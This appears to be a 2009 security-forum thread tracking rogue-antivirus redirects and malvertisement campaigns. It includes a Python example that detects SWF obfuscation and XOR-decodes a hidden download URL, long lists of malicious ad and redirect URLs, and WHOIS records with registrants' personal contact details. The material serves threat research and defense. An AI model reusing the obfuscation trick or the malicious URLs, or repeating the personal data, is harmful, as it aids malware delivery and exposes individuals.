Symantec 1.4.4.12 2009.03.27 Trojan Horse
TheHacker 6.3.3.7.292 2009.03.26 -
TrendMicro 8.700.0.1004 2009.03.27 -
VBA32 3.12.10.1 2009.03.26 -
ViRobot 2009.3.26.1664 2009.03.26 -
VirusBuster 4.6.5.0 2009.03.26 Trojan.Waledac.Gen!Pac.8
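The two Flash.swf posts describe the same trick: the executable's URL sits in the SWF as XORed binary data, with the key present in the code. The i45.swf post adds the obfuscation findings (Tag Type 255 at an offset, a DefineBits tag that does not contain an image). The Python below is an added example, not code from any of those posts or from any tool named on the page. It builds a small uncompressed SWF with those three features, walks the tag list using the RECORDHEADER layout of the SWF format (tag type in the upper 10 bits of a little-endian u16, length in the lower 6, 0x3f meaning a u32 length follows), reports the invalid tag and the bogus DefineBits in the wording the post uses, and recovers the URL from a DefineBinaryData tag by trying every single-byte XOR key, so it also works when the key has not been spotted in the code. The URL, the key 0x5A and the tag contents are constructed for the example.

```python
import re
import struct

# Highest tag code defined by the SWF specification (EnableTelemetry);
# anything above it cannot be a real tag.
MAX_DEFINED_TAG = 93
END_TAG, DEFINE_BITS, DEFINE_BINARY_DATA = 0, 6, 87
JPEG_SOI = b"\xff\xd8"
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")

def build_tag(tag_type, payload):
    """RECORDHEADER: u16 LE = (type << 6) | length; 0x3f means a u32 length follows."""
    if len(payload) < 0x3F:
        return struct.pack("<H", (tag_type << 6) | len(payload)) + payload
    return struct.pack("<HI", (tag_type << 6) | 0x3F, len(payload)) + payload

def build_swf(tags):
    """Minimal uncompressed SWF: 'FWS', version, u32 file length, RECT with
    Nbits=0 (a single zero byte), u16 frame rate, u16 frame count, then tags."""
    body = b"\x00" + struct.pack("<HH", 0x0C00, 1) + b"".join(tags)
    return b"FWS" + bytes([9]) + struct.pack("<I", 8 + len(body)) + body

def xor_bytes(data, key):
    return bytes(b ^ key for b in data)

def build_sample():
    """Constructed SWF showing the three features described in the posts."""
    url = b"http://example.invalid/files/load.exe"   # hypothetical download URL
    key = 0x5A                                       # constructed XOR key
    return build_swf([
        build_tag(255, b""),                                               # invalid tag type
        build_tag(DEFINE_BITS, struct.pack("<H", 1) + b"\x00\x01\x02\x03"),  # no JPEG data
        build_tag(DEFINE_BINARY_DATA, struct.pack("<HI", 2, 0) + xor_bytes(url, key)),
        build_tag(END_TAG, b""),
    ])

def parse_tags(swf):
    """Return (tag_type, file_offset, payload) for every tag of an uncompressed SWF."""
    if swf[:3] != b"FWS":
        raise ValueError("only uncompressed (FWS) files are handled here")
    nbits = swf[8] >> 3                        # RECT: 5-bit Nbits then four Nbits fields
    pos = 8 + (5 + 4 * nbits + 7) // 8 + 4     # RECT bytes + frame rate + frame count
    tags = []
    while pos + 2 <= len(swf):
        code, = struct.unpack_from("<H", swf, pos)
        tag_type, length, hdr = code >> 6, code & 0x3F, 2
        if length == 0x3F:
            length, = struct.unpack_from("<I", swf, pos + 2)
            hdr = 6
        tags.append((tag_type, pos, swf[pos + hdr:pos + hdr + length]))
        pos += hdr + length
        if tag_type == END_TAG:
            break
    return tags

def audit(swf):
    """Findings in the post's wording: undefined tag types and DefineBits without JPEG data."""
    findings = []
    for tag_type, off, data in parse_tags(swf):
        if tag_type > MAX_DEFINED_TAG:
            findings.append(f"Invalid tag - Tag Type {tag_type} at file byte offset {off}")
        elif tag_type == DEFINE_BITS and data[2:4] != JPEG_SOI:
            # payload = u16 CharacterID followed by JPEG data, which begins with SOI
            findings.append(f"Tag DefineBits (offset 0x{off:08x}) does not contain a valid image")
    return findings

def recover_urls(swf):
    """Try every single-byte XOR key on each DefineBinaryData payload
    (u16 CharacterID, u32 reserved, then data) and keep decodings holding a URL."""
    hits = []
    for tag_type, _off, data in parse_tags(swf):
        if tag_type != DEFINE_BINARY_DATA:
            continue
        blob = data[6:]
        for key in range(256):
            for m in URL_RE.finditer(xor_bytes(blob, key)):
                hits.append((key, m.group().decode("ascii")))
    return hits

if __name__ == "__main__":
    sample = build_sample()
    for line in audit(sample):
        print(line)
    for key, url in recover_urls(sample):
        print(f"key 0x{key:02x}: {url}")
```

Real samples are usually CWS (zlib) or ZWS (LZMA) compressed after the 8-byte header; inflate the body first and feed the parser the reconstructed FWS bytes. The brute force is cheap because a wrong key cannot produce "http://" from a payload that contained it under the right key, so the only decoding with a URL in it is the real one.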
Kimberly
<h4>
netservice2.net - gointoscan.com - fuse4scan.com
</h4>

Internet Antivirus Redirects.

netservice2.net/redirect/
gointoscan.com/?uid=[*]
fuse4scan.com/?uid=[*]
Antivirus 2009 / 2010 / 360 has been replaced by Internet Antivirus at the time of writing.

Closing the webpage using ALT + F4 will trigger a nag screen and initiate a direct download.

Upon closing the nag screen, an ultimate alert about a privacy violation will be displayed in order to scare the victim.

netservice2.net - 212.95.63.237

Updated Date: 05-jan-2009
Creation Date: 05-jan-2009
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET
Registrar: BIZCN.COM, INC.

Registrant Contact:
Steven Lucas steven_lucas_2000@yahoo.com
+1.3023892438 fax: +1.3023892438
5215/2 SW 152 Court
Beaverton NA 97011
us

gointoscan.com - 78.159.101.27

Updated Date: 04-mar-2009
Creation Date: 03-mar-2009
Name Server: NS1.DNSEXIT.COM - NS2.DNSEXIT.COM
Registrar: REGTIME LTD.

Registrant:
Mario Simone
Email: ficdomba@gmail.com
Organization: Private person
Address: Corso Vittorio Emanuele 47
City: Torino
State: Torino
ZIP: 10125
Country: IT
Phone: +39.0116505771

fuse4scan.com - 78.159.101.27

Updated Date: 23-mar-2009
Creation Date: 23-mar-2009
Name Server: NS1.DNSEXIT.COM - NS2.DNSEXIT.COM
Registrar: UK2 GROUP LTD.

Registrant:
Jan Wanjiku (riebeniz@gmail.com)
Dzouva 1
Ancient Olympia
null,G27065
GR
Tel. +26.24023850
Kimberly
<h4>
mediatraff.com - 72.232.107.18
</h4>
In the past we already noticed that the bad guys simply used the same sentences to describe their activities on different websites instead of being creative. Today I would like to draw your attention to a "copy content rip" when reading the MediaTraff "About us" page.
Back in December 2008 Koeppel Interactive was being impersonated using the domain koeppelinteractive.co.uk. Is MediaTraff trying to achieve the same, or is the paragraph used below a simple coincidence?

QUOTE
a new media advertising agency providing online media buying, interactive video advertising and on-demand media buying services to the direct response industry. Our mission is to deliver next generation direct response campaigns that are impactful, profitable and always exceed our clients' expectations.

mediatraff.com - 72.232.107.18

Updated Date: 01-oct-2008
Creation Date: 25-sep-2008
Name Server: NS1.MEDIATRAFF.COM - NS2.MEDIATRAFF.COM
Registrar: MONIKER ONLINE SERVICES, INC.

Registrant [1542303]:
David, Joner support@MediaTraff.com
MediaTraff Inc.
37 Highland Ave
White River Junction
VT
05001
US
Kimberly
<h4>
carpass.blogspot.com
</h4>
Looks like someone has a slight grudge against Bluetack, since they put a heavy load on our server using a blogspot page containing links, disguised as 1-pixel images, to our forum. carpass.blogspot.com was probably used in some dodgy advertising rotator, seeing the huge number of IPs hammering our server. Sincere apologies to anyone experiencing trouble reaching our website during the period between 31 March and 2 April. Special thanks fly out to the Google Blogger team for their speedy action in taking down carpass.blogspot.com.

The BISS Admin Team.

Kimberly
<h4>
Warning: Circulating Malvertizements
</h4>
It has been brought to my attention that a huge number of malvertizements are still circulating, although some are 2 months old. As seen below, the bad guys remain very active and manage to sell their malicious banners to several different high-profile advertising agencies. Some of them have been victims in the past and, from what I see, are still not cautious enough when accepting advertisements that continue to infect innocent users.

Furthermore, all content from perfect-banner.com should be considered unsafe. More details.

Rhapsody
m1.2mdn.net/2190195/rhapsody728x90.swf
web.checkm8.com/data/460377/rhapsody728x90.swf
perfect-banner.com/www/images/rhapsody-photobucket728x90.swf
perfect-banner.com/www/images/rhapsody-interevco728x90.swf
www.alibi.com/includes/ruxton/rhapsody728x90.swf
ads.live365.com/sponsors/rhapsody/rhapsody728x90.swf
imagec12.247realmedia.com/RealMedia/ads/Creatives/TheVoice/all_Rhapsody_032409_728_rem/rhapsody728x90.swf/1237928016
imagec12.247realmedia.com/RealMedia/ads/Creatives/LikeMe/rux_Rhapsody_032409_728_rem/rhapsody728x90.swf/1237928635
imagec14.247realmedia.com/RealMedia/ads/Creatives/RevPub/acw_ruxton_rhapsody_032509/rhapsody728x90.swf/1238008035
imagec14.247realmedia.com/RealMedia/ads/Creatives/RevPub/pw_ruxton_rhapsody/rhapsody728x90.swf/1237923880
imagec05.247realmedia.com/RealMedia/ads/Creatives/CtyPaper/0903_ruxton_rhapsody/rhapsody728x90.swf/1237926269
gorillafights.com/adsmanager/www/delivery/ai.php?filename=rhapsody_728x90.swf
ads.tucsonweekly.com/ads/adimage.php?filename=rhapsody728x90_2.swf
banners.thestranger.com/ads/adimage.php?filename=rhapsody728x90.swf
ads.memphisflyer.com/phpadsnew/adimage.php?filename=rhapsody728x90.swf
ads.boiseweekly.com/ads/adimage.php?filename=rhapsody728x90.swf
www.fwweekly.com/files/banner_ads/rhapsody728x90.swf
ads.avenews.com/adimage.php?filename=ruxton_rhapsody728x90.swf
citybeat.wehaa-ads.com/www/delivery/ai.php?filename=rhapsody728x90.swf&contenttype=swf
c3.openx.org/574bdfcaf65ecedb190b2d1c8f0fa48c.swf

m1.2mdn.net/2190195/rhapsody300x250.swf
mc.dailymotion.com/masscast/0/OasDefault/US_Rhapsod_6509_2773/rhapsody300x250.swf
perfect-banner.com/www/images/rhapsody-photobucket300x250.swf
perfect-banner.com/www/images/rhapsody-interevco300x250.swf
perfect-banner.com/www/images/rhapsody300x250-ugo2.swf
ads.live365.com/sponsors/rhapsody/rhapsody300x250.swf
imagec05.247realmedia.com/RealMedia/ads/Creatives/HlywdSer/9261_HW_Rhapsody_com_300_ROS/rhapsody_300x250.swf/1238180607

m1.2mdn.net/2190195/rhapsody160x600.swf
perfect-banner.com/www/images/rhapsody-photobucket160x600.swf
ads.live365.com/sponsors/rhapsody/rhapsody160x600.swf

HP - Hewlett Packard

logiagroup.checkm8.com/data/478091/HP_468x60.swf

logiagroup.checkm8.com/data/478089/HP_728x90.swf
logiagroup.checkm8.com/data/479237/HP_728x90.swf
d13.zedo.com/OzoDB/s/z/538758/V1/hp_728x90.swf

logiagroup.checkm8.com/data/479231/HP_300x250.swf
d13.zedo.com/OzoDB/7/0/538809/V1/hp_300x250.swf
imagec10.247realmedia.com/RealMedia/ads/Creatives/PhoenixMedia/BO-YourDirectMedia-0403-300250/HP_300xx250.swf/1238793170

ads.advance.net/RealMedia/ads/Creatives/NJONLINE/Hewlett01_NJ_RoS_Sky/HP_160x600.swf

TravelWise

static.jpxpt.com/RealMedia/ads/Creatives/OasDefault/TravelVise_728x90/TW_728x90.swf
static.jpnt6.0t.com/RealMedia/ads/Creatives/OasDefault/TravelVise_728x90/TW_728x90.swf
bmp.outreach.com/content/travel_wise5_728x90.swf

cache.fimservecdn.com/contents/507/241/241507/CR_travel.myspace.2march.2009_030209.swf
cache.fimservecdn.com/contents/507/241/241507/myspace.swf


Swatch

perfect-banner.com/www/images/728x90_2.swf
perfect-banner.com/www/images/728x90_3.swf


perfect-banner.com/www/images/336x280.swf
perfect-banner.com/www/images/336x280_2.swf


perfect-banner.com/www/images/swatch160_601.swf

Softlens

limelight.smartadserver.com/diff/242/430304/Softlens_creative_update.swf

Jobfox

ads.beyond.com/banners/jobfox_468x60.swf

ETrade

imagec05.247realmedia.com/RealMedia/ads/Creatives/Trademkt/eTrade0409-150x40/etrade150x40.swf/1239037976

Skyauction

banner.pando.com/adimage.php?filename=skyauction468x60.swf

<h4>
Redirects associated with the different malvertizements
</h4>
st-aticglobalsources.com/c/index.php?id=[*]
securityclick.net/?cmpid=[*]&id=[*]&website=[*]

st-ation-appraisals.net/c/index.php?id=[*]
securityclick.net/?cmpid=[*]&id=[*]&website=[*]

hitoptimist.com/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]

hit-detect.com/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]

hitoptimist.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]&url=[*]&m=[*]

of-ficialstat.com/c/index.php?id=[*]
securityclick.net/?cmpid=[*]

stats-manager-online.com/c/index.php?id=[*]
clickanalytic.com/?cmpid=[*]&id=[*]&client=[*]

traffic-analytics.com/c/index.php?id=[*]
clickanalytic.com/?cmpid=[*]

googlesearchingweb.net/c/index.php?id=[*]
clickanalytic.com/?cmpid=[*]

statisticsishere.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]

hitoptimist.com/c/index.php?id=[*]
statsnclick.com/?cmpid=[*]

hit-detect.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]

statisticsishere.com/c/index.php?id=
measurehits.com/?cmpid=[*]&url=[*]&id=[*]

cosmotraf.net/c/index.php?id=[*]
measurehits.com/?cmpid=[*]&subaff=[*]

cosmotraf.net/c/index.php?id=[*]
pleaselinkmeto.com/?cmpid=[*]

ydmstats.com/c/index.php?id=[*]
welovesandi.com/?cmpid=[*]


Victims will be redirected to a fake online scanner (removespywarethreats.com in the sample).


<h4>
IP Details
</h4>
st-aticglobalsources.com

Status: clientHold
Updated Date: 04-mar-2009
Name Server: NS1.ST-ATICGLOBALSOURCES.COM - NS2.ST-ATICGLOBALSOURCES.COM - NS3.ST-ATICGLOBALSOURCES.COM - NS4.ST-ATICGLOBALSOURCES.COM
ITmeter INC - Sergey Belonozhko (sergbelo@gmail.com)

st-ation-appraisals.net

Status: clientHold
Updated Date: 04-mar-2009
Name Server: NS1.ST-ATION-APPRAISALS.NET - NS2.ST-ATION-APPRAISALS.NET - NS3.ST-ATION-APPRAISALS.NET - NS4.ST-ATION-APPRAISALS.NET
ITmeter INC - Sergey Belonozhko (sergbelo@gmail.com)

of-ficialstat.com

Status: clientHold
Updated Date: 04-mar-2009
Name Server: NS1.OF-FICIALSTAT.COM - NS2.OF-FICIALSTAT.COM - NS3.OF-FICIALSTAT.COM - NS4.OF-FICIALSTAT.COM
ITmeter INC - Sergey Belonozhko (sergbelo@gmail.com)

clickanalytic.com

Status: clientHold
Updated Date: 12-mar-2009
Creation Date: 06-feb-2009
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Registrant Contact: Sergey Belonozhko (vaska4yvak@mail.com)

googlesearchingweb.net

Status: clientHold
Updated Date: 12-mar-2009
Creation Date: 05-feb-2009
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Registrant Contact: Sergey Belonozhko (vaska4yvak@mail.com)

securityclick.net

Status: clientHold
Updated Date: 26-mar-2009
Name Server: DNS1.NAME-SERVICES.COM - DNS2.NAME-SERVICES.COM - DNS3.NAME-SERVICES.COM - DNS4.NAME-SERVICES.COM - DNS5.NAME-SERVICES.COM
noo - Serg Moons (moon.serg@gmail.com)

stats-manager-online.com

Status: clientHold
Updated Date: 05-mar-2009
Creation Date: 05-feb-2009
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Registrant Contact: PrivacyProtect.org

traffic-analytics.com

Status: clientHold
Updated Date: 05-mar-2009
Creation Date: 06-feb-2009
Name Server: NS1.SUSPENDED-DOMAIN.COM - NS2.SUSPENDED-DOMAIN.COM
Registrant Contact: PrivacyProtect.org

hitoptimist.com - 88.198.8.15

Updated Date: 10-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com

cosmotraf.net - 88.198.8.15

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com

ydmstats.com - 88.198.8.15

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com

hit-detect.com - 88.198.8.15

Updated Date: 11-mar-2009
Creation Date: 10-mar-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.HIT-DETECT.COM - NS2.HIT-DETECT.COM - NS3.HIT-DETECT.COM
Gabriel Jenks - gabrielcjenks17@mail.com

statisticsishere.com - 88.198.8.15

Updated Date: 10-mar-2009
Creation Date: 05-mar-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.STATISTICSISHERE.COM - NS2.STATISTICSISHERE.COM - NS3.STATISTICSISHERE.COM
Gabriel Jenks - gabrielcjenks17@mail.com

statsnclick.com - 212.117.165.128

Updated Date: 11-mar-2009
Creation Date: 10-mar-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.STATSNCLICK.COM - NS2.STATSNCLICK.COM - NS3.STATSNCLICK.COM
Gabriel Jenks - gabrielcjenks17@mail.com

measurehits.com - 212.117.165.128

Updated Date: 05-mar-2009
Creation Date: 26-feb-2009
Registrar: YESNIC CO. LTD.
Name Server: NS1.MEASUREHITS.COM - NS2.MEASUREHITS.COM - NS3.MEASUREHITS.COM
Gabriel Jenks - gabrielcjenks17@mail.com

pleaselinkmeto.com - 212.117.165.128

Updated Date: 05-mar-2009
Creation Date: 05-mar-2009
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Name Server: DNS1.COMMUNIGAL.NET - DNS2.COMMUNIGAL.NET
Domain Contact is Private - domainprivate@communigal.com